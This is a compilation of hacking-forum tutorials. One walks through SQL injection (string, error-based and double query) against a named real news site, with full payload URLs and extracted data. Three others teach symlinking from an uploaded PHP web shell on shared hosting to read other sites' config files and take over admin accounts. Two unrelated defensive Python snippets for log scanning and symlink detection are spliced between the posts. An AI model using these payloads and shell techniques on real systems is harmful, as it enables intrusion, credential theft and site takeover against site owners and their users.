
An Sqli hack. From string based to error based to double query injection.

Shout out to my good friend zerofreak, who helped me with syntax issues and with this method.

OK, so today the vulnerable site in question for the demonstration is:

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493

We start like any other sqli test with the ' at the end of the URL.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493'

We see:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1493''' at line 1

First sign that it is vulnerable. Now let's continue to count the columns. For this we do an ORDER BY.

Let's start with 20.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null order by 20--

Page returns with no error, so 20+ columns exist. Let's continue...

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null order by 25--

Still no error. Let's go higher.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null order by 30--

Still no error. At this point I have an idea of what may be happening so I do.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null'order by 30--+

Unknown column '30' in 'order clause'

As you see, adding the new command operators has triggered the error. This is called string based injection.

Now we have to figure out the correct number of columns with our new injection method.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null'order by 20--+

Unknown column '20' in 'order clause'

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null'order by 19--+

No error. Means 19 columns exist. Now let's get the vulnerable column number.

For this we use union select.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+-

The used SELECT statements have a different number of columns

WTF you may ask? This can happen quite regularly. It does not mean you have done anything wrong. We both know we have correctly counted the columns and that our syntax was correct. We now just have to switch injection method to Error Based.

First we want to get the database.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=null'and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-

There we go. The name of the database:

[Image: Rllvv.jpg]

'fairfax~1'

Next let's get the tables.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493'and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-

[Image: vB74j.jpg]

Unfortunately the tables in this database are pretty crappy, so for demonstration purposes I am using the first table in the database to extract data from via the first two columns.

The response we got for the first table was:

Duplicate entry 'archive_view~1' for key 1

We will need to hex the table name for our next command when we get the column data contained within the table.

Important: disregard the ~1 of the table name and just 'text to hex' archive_view.

Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x617263686976655f7669657 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+-

It loads normally so that indicates to us that we need to switch to double query injection. God damn.

Double query is basically doubling the query to throw errors which will contain vital data within it.

However, it involves a little more hexing: we need to hex the database name and the table name within our query.

So let's hex each of them:

Database

Quote:fairfax = 666169726661780920


Table name.

Quote:archive_view = 617263686976655f76696577


And in our query:
Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x66616972666178 AND table_name=0x617263686976655f76696577 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

We see the name of our first column:

[Image: eHJI2.jpg]

To go to the next column we change the query to:
Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x66616972666178 AND table_name=0x617263686976655f76696577 LIMIT 1,1)) from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

Etc etc.

So now we know this:

Table is called archive_view

The first two columns of archive_view table are called:

id

And

pubdate

Now let's extract the data contained within the columns from the table.

As this is double query, each column has to be done separately. It's not like regular sqli in which username and password can both be extracted and delivered at the same time.

Below we have to specify the table name we are extracting from, the column name we are extracting from the table and the database name.

This is how the query looks:
Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(archive_view.id as char),0x27,0x7e) FROM `fairfax`.archive_view LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

And you get the data contained for the first result within the id column in the archive_view table:

[Image: qxk9V.jpg]

You can also implement the query via the 0,1 if, for example, you're extracting usernames or passwords.

Now let's do the second column called pubdate.

We simply change the id to pubdate in the query like below:
Quote:http://ww2.fairfaxtimes.com/cms/story.php?id=1493' and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(archive_view.pubdate as char),0x27,0x7e) FROM `fairfax`.archive_view LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

And there we go. It looks like this:

[Image: FjJuh.jpg]

We have recovered data from two sets of columns from the first table within the database using several different forms of sqli. In an ideal situation you would apply these methods to username and password and email extraction.

Hope you all enjoyed the tutorial. Brought to you by VipVince.
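As a defender's counterpart to the walk-through above, here is an added example (not from the original post) that classifies the request shapes it uses (the quote-then-ORDER BY probe, the UNION SELECT column probe, information_schema enumeration and the floor(rand(0)*2)/GROUP BY error trick) in web-server access logs so they can be alerted on. The log lines are constructed and the regexes are my own approximations, not a vendor rule set.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the stages walked through in the post above: the quote-then-
# ORDER BY column count, the UNION SELECT column probe, information_schema
# enumeration, and the floor(rand(0)*2)/GROUP BY "double query" error trick.
# Most specific first, so the first match names the stage.
SIGNATURES = [
    ("error_based_double_query",
     re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S)),
    ("schema_enumeration", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("union_column_probe", re.compile(r"union\s+(all\s+)?select\s+\d+(\s*,\s*\d+)+", re.I)),
    ("order_by_column_count", re.compile(r"'\s*order\s+by\s+\d+\s*--", re.I)),
]
HEX_LITERAL = re.compile(r"\b0x[0-9a-f]{6,}\b", re.I)   # hex-encoded db/table names
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify_request(path):
    """Return the name of the injection stage a request path matches, or None."""
    decoded = unquote_plus(path)          # %27 -> ', + -> space, as the server sees it
    for name, pattern in SIGNATURES:
        if pattern.search(decoded):
            return name
    return None

def scan_log(lines):
    """Return (stage, status, hex_literal_count, raw_path) for each suspicious line."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        stage = classify_request(m.group("path"))
        if stage:
            n_hex = len(HEX_LITERAL.findall(unquote_plus(m.group("path"))))
            hits.append((stage, int(m.group("status")), n_hex, m.group("path")))
    return hits

# Constructed sample access-log lines (not from the original post); the payload
# shapes mirror the ones shown above, URL-encoded the way a browser sends them.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /cms/story.php?id=1493 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /cms/story.php?id=null%27order%20by%2030--+ HTTP/1.1" 200 640',
    '203.0.113.5 - - [10/Oct/2023:13:55:48 +0000] "GET /cms/story.php?id=null%27%20union%20select%201,2,3,4,5--+- HTTP/1.1" 200 640',
    '203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /cms/story.php?id=1493%27%20and(select%201%20from'
    '(select%20count(*),concat((select%20column_name%20from%20information_schema.columns%20where'
    '%20table_name=0x617263686976655f76696577%20limit%200,1),floor(rand(0)*2))x%20from'
    '%20information_schema.tables%20group%20by%20x)a)--+ HTTP/1.1" 200 620',
]
```

`scan_log(SAMPLE_LOG)` returns three hits, all with status 200: the point of the post is that the application answered every payload normally, so only the request shape (and the hex literals in the last one) gives the probing away.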

Private Symlink(PHP) Exploit Tutorial

First of all, we use the symlink function to make a shortcut for any file or folder we want;

that's why this function will be very useful for us to read any folder or file we want (for more info use Google).

Here we are using the shell named "c99" to execute the small piece of PHP code (eval code) on the shared hosting server.

The exploit is used to download the slave's database if and only if the slave is on a shared host.


Download the below Shell & Follow the steps.

==================================================
Get Any C99 Shell
==================================================

/Step 1 $ Upload the PHP shell, i.e. Shell_Silic0n.php, on your root path. That is /home/hackerz/public_html .

/Step 2 $ Open the uploaded file. The path will look like

==================================================
http://www.yoursitename.com/shell_Silic0n.php
==================================================


/Step 3 $ Next step is to read carefully the PHP eval code below. It's about 10 lines of PHP code.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

$filepath='/home/xx/public_html/xx.xx';
$sitepath='/home/xx/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$writeblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "

Symlink (PHP) Exploit

++++++++++++++++++++++++++++++++++++++++++++++++++
Tutorial Name: Symlink (PHP) Exploit [Private (PhP Code) For Sometimes]
Author: dREviL
*Dont Share without credits*
++++++++++++++++++++++++++++++++++++++++++++++++++

First of all, we use symlink to read the config file of other sites hosted on the same servers. Symlinking can be done in many methods, and today I will show a new one that was private for some time and now it's shared. In this tutorial we will execute a PHP (eval code) to symlink in a shared hosting. Let's begin. We need a shell that allows PHP eval code executing. First we get the full path of root /home/r00tb0x/public_html. And now the PHP code
Code:
$filepath='/home/username/public_html/txtfile';
$sitepath='/home/edit/public_html/';
$writeblefilepath='myfile.txt';$flib=$sitepath.$writeblefilepath;
@unlink($flib);
symlink($filepath, $flib);
echo readlink($flib) . "\n";
echo "

How to symlink on a linux server [TuT] [Website hacking !!]

How to symlink ? (TUTORIAL)

Written by -ThatGuy- for beginner webhackers.

NOTE : I do not take any responsibility for your actions. This was written for educational purposes only ! Also sorry for my bad english !


Hello HackForums.
Today I'll try to help beginner webhackers by teaching them a method called symlink.

What is symlink ?
Symlink is a method used by hackers to read files from other users on a linux server, only by using a php-shell.

So what do we require to start the tutorial :

Requirements :

- a phpshell uploaded in a linux server (Safe MODE = OFF )
- a target site
- basic phpshell & linux knowledge
- a brain !

Let's start the tutorial.

Where to get a target, if you only have a phpshell uploaded in a linux server that has some sites ?
It's easy , first get the IP of the server.
Then go to bing.com and search like that :
Code:
ip:xx.xxx.xxx.xxx vbulletin
Replace xxx with the IP address of the server, and 'vbulletin' you can change to the name of a forum software or a CMS you wish as a target. But for this example I'll take vBulletin.

OK , now we got the target site , let's suppose that its domain name is mytarget.com and it uses vBulletin forum software.

Now starts the real hacking !

Go to your phpshell, and in the 'Execute command' field, execute this command:
Code:
ls -la /etc/valiases/mytarget.com
By executing this command, I'll get the name of the user (on the linux server) that keeps the website mytarget.com.
It should return with a result similar to that :

-rw-r--r-- 1 target mail 28 May 28 2011 /etc/valiases/mytarget.com

The red colored piece is the user of mytarget.com on the server.
So in our case the username is 'target'

Many of us know that the configuration file of vBulletin script ,can be found in /includes/config.php.
This is the file we need to read in our case , in order to get access at our target site.
How can we read that file ?
Simple , execute that command on the shell :
Code:
ln -s /home/target/public_html/includes/config.php symlink.txt
As you can see, we're writing the content of config.php into the symlink.txt file.
After you execute the command, you will see a new file called symlink.txt.
Open it and w00t !! You successfully read the configuration file (symlinked).
Now, just get a MySQL connector script coded in PHP, and login with the details you get from the configuration file of your target. Then at the admin table, get the admin's hash and crack it, or better, change the admin's email to yours, and then do a forgot password at mytarget.com.
And then you will successfully get full access to your target site!

That was all, very easy if you practice many times. Maybe soon I will make a video tutorial if you still didn't understand; just request the video tut in the comments, and I will try ASAP to make it for you!

Thanks for reading , -ThatGuy- !
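The three symlink posts above all rely on one shared-hosting weakness: a symlink in one account's public_html that resolves into another account's home. Here is an added example (not from any of the posts) of the check a hosting administrator can run to find such cross-account links; the directory layout it builds is a constructed fixture, not a real server.

```python
import os
import tempfile
from pathlib import Path

def find_escaping_symlinks(home_root):
    """Return (link, resolved_target) pairs for every symlink under
    <home_root>/<account>/ whose target resolves outside that account's own
    home, i.e. the 'ln -s /home/target/.../config.php symlink.txt' pattern
    from the posts above, planted in another account's public_html."""
    home_root = Path(home_root).resolve()
    findings = []
    for account_home in sorted(home_root.iterdir()):
        if not account_home.is_dir():
            continue
        # followlinks=False (the default): we inspect links, never descend through them
        for dirpath, dirnames, filenames in os.walk(account_home):
            for name in dirnames + filenames:
                link = Path(dirpath) / name
                if not link.is_symlink():
                    continue
                target = link.resolve()   # non-strict: dangling links still resolve to a path
                try:
                    target.relative_to(account_home)
                except ValueError:        # target is not inside this account's home
                    findings.append((str(link), str(target)))
    return findings

def build_demo_layout():
    """Constructed fixture (not a real server): two hosting accounts, one of
    which symlinks into the other's config file, plus a benign in-account link."""
    root = Path(tempfile.mkdtemp()) / "home"
    victim_cfg = root / "target" / "public_html" / "includes" / "config.php"
    victim_cfg.parent.mkdir(parents=True)
    victim_cfg.write_text("<?php // constructed placeholder config\n")
    attacker_html = root / "hackerz" / "public_html"
    attacker_html.mkdir(parents=True)
    (attacker_html / "symlink.txt").symlink_to(victim_cfg)                 # cross-account: flagged
    (attacker_html / "local.txt").symlink_to(attacker_html / "real.txt")  # stays in-account: ignored
    return root

if __name__ == "__main__":
    for link, target in find_escaping_symlinks(build_demo_layout()):
        print(f"ESCAPING SYMLINK: {link} -> {target}")
```

On a live host run it as root over /home; finding such links is the detection side, while Apache's `Options SymLinksIfOwnerMatch` (instead of `FollowSymLinks`) and a per-account PHP `open_basedir` remove the read path these tutorials depend on.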
